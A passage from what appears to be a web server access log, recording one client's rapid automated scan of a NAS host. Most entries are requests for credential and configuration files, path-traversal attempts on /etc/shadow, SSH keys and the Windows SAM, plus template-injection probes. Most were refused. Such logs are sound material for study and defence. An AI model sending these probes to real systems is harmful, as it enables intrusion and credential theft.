185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/duplicator/readme.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - - 403 - GET https nas.profibot.hu "/feeds/importer?src=http://target" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/upgrade.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 404 404 - GET https nas.profibot.hu "/:2181" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:40 +0000] - 403 403 - GET https nas.profibot.hu "/.dir-locals.el" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/socket.io/?transport=websocket" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/admin/init" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/ws/?token=" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/integration/payments_bridge.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/application.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?dir=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../wp-config.php" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/waf.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/stripe/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/autocharge/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/mollie/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/hidden-services/map.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255croot/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/ssi/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?folder=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/piwik.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/system/ping?target=127.0.0.1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/tpl?body={%%20print(7*7)%20%}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/gateway/fallback_policies.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:41 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postfixadmin/config.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/woocommerce/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/admin/users/1/roles" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/src/config/stripe.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 403 403 - GET https nas.profibot.hu "/wallets/.keystore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/etc/httpd/conf.d/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fetc/shadow" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/:27017" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/pix/credentials.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/web3/login_config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/invoice?id=1001" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 403 403 - GET https nas.profibot.hu "/~/.muttrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/user/reset" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/etc/nginx/sites-enabled/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/teamcity" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/app_old/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/cards/issuance_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/envoy.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/tools/build_config.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:42 +0000] - 404 404 - GET https nas.profibot.hu "/etc/esmtprc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/all-in-one-wp-migration/readme.txt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/token?header={injected}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/paysafe/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/infotainment/env.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/user?id=1" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/firebase.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/marketplace/payout_schedule.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/swarm/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postfix/main.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/pytest.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/public/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/debug" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/tests/e2e/config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/build.sbt" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/livechat/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/artifacts/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:43 +0000] - 404 404 - GET https nas.profibot.hu "/release_schedules.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/settings" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/account/lookup?ref=invoice_id" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/banking/routing_numbers.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/:9200" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/azure-pipelines.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/config/paypal.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/crypto/bitpay/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase-commerce.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/nginx/lua_waf_config.lua" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/src_code.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/interac/settings.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/wearable/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 403 403 - GET https nas.profibot.hu "/.cargo/config.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 403 403 - GET https nas.profibot.hu "/did/.well-known/did.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/ios/Runner/Info.plist" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/core/scripts/password-hash.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/pki/cert_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/matomo.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - 404 404 - GET https nas.profibot.hu "/empire/server.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:44 +0000] - - 403 - GET https nas.profibot.hu "/?callback=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/packages.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/infura/project.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/blockchain_checkout/config.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/Jenkinsfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/bitcoin/bitcoin.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/qubit/program.qasm" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/account/change-email?id=2" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/onnx_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/admin_backup" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/jenkins/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/////////////windows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/site.config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/pub/static/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/fluent-bit/config.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:45 +0000] - 404 404 - GET https nas.profibot.hu "/backup.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/consul/service-registry.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/ai-agent/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cetc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/snare/snare.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/composer.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/watch.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/docker/overlay/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/failover/billing_retry_matrix.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/Cargo.lock" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/config/tf_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/patches/update.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/cgi-bin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/smtp-relay-provider/credentials.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/disputes/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/gcp/metadata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/usr/share/webmin/dovecot/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https nas.profibot.hu "/aspnet_client/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:46 +0000] - 404 404 - GET https 